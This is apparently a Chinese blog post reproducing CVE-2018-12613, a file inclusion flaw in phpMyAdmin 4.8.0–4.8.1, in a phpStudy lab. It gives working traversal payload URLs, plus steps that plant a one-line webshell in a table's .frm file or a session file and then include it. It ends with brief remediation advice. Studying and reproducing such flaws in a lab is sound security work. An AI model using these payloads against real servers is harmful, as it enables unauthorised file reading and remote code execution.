mysql cve_CVE-2018-12613phpMyAdmin文件包含漏洞复现

0x00简介

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

38aa8a8c2ee7489a0c5cf7f3c3120445.png

0x01漏洞概述

攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:

$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;

$ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。

0x02影响范围

phpMyAdmin 4.8.0

phpMyAdmin 4.8.1

0x03环境搭建

phpstudy2018+phpmyadmin4.8.1

1.下载phpstudy2018然后删除自带的phpmyadmin

下载地址:http://public.xp.cn/upgrades/PhpStudy2018.zip

774c597b2fac3692e154d8b070535605.png

2.下载phpmyadmin4.8.1版本

下载地址:https://www.phpmyadmin.net/files/

b8c9fa4374264f388f4d5bbe3971ddfb.png

3.把下载好的phpmyadmin放入phpstudy的www目录下重新命名

e343872f3eab0da3ceb35a0b16906e87.png

4.在浏览器查看phpmyadmin的版本

http://your-IP/phpmyadmin/README

7ff6d9a5d4802e9f5733c89a683eb1ef.png

0x04漏洞复现

1.在浏览器打开phpmyadmin,需要使用账号登录进去 //略显鸡肋

1b59c51d7cbe07412dc512930fe051b4.png

2.方法一、登录进去在首页输入以下payload

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../Windows\win.ini

976fe1400b41dee659b3efadb2c40fc8.png

3.在test数据库中创建一个表,然后在表中创建一个字段为一句话木马

eebe14c6721fa47b46b67a6564ff7aae.png

1e669c800361fce1269c8c872792ad25.png

f1758f66eff8f179e3969c9b14cae062.png

4.在受害机查看MySQL/data对应数据库下生成一个frm文件是否写入进去,使用记事本打开

86c36f725fd4e3f2c7a77072cd97b768.png

5.使用文件包含,包含此路径下的文件

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../phpStudy\PHPTutorial\MySQL\data\test\demo.frm

2e03fc12c641027eecf571d9b0680cbf.png

6.方法二、通过 phpsession序列化数据保存至session文件,包含其缓存文件。通过一句话木马,进而包含sess_sessionId文件。

6.1、在最新sql语句的地方执行以下命令

select ‘<?php phpinfo() ?>’;

55896b3842a1c6a62c6634afde104cc6.png

cbcd8716edfc05a3f690ece20976229c.png

6.2、使用F12查看网站Session值,查看当前页面cookie中的phpmyadmin的值

2e8ddc786ac3f3f027416221dbeaa3b2.png

610aac81db457983477e7b1982651d16.png

6.3、使用文件包含包含此目录下的Session值的URL路径

8974f86521247fb727032c4d0b0fca89.png

0x05修复建议

1. 建议使用最新版本的phpmyadmin

2. 使用复杂的账号密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值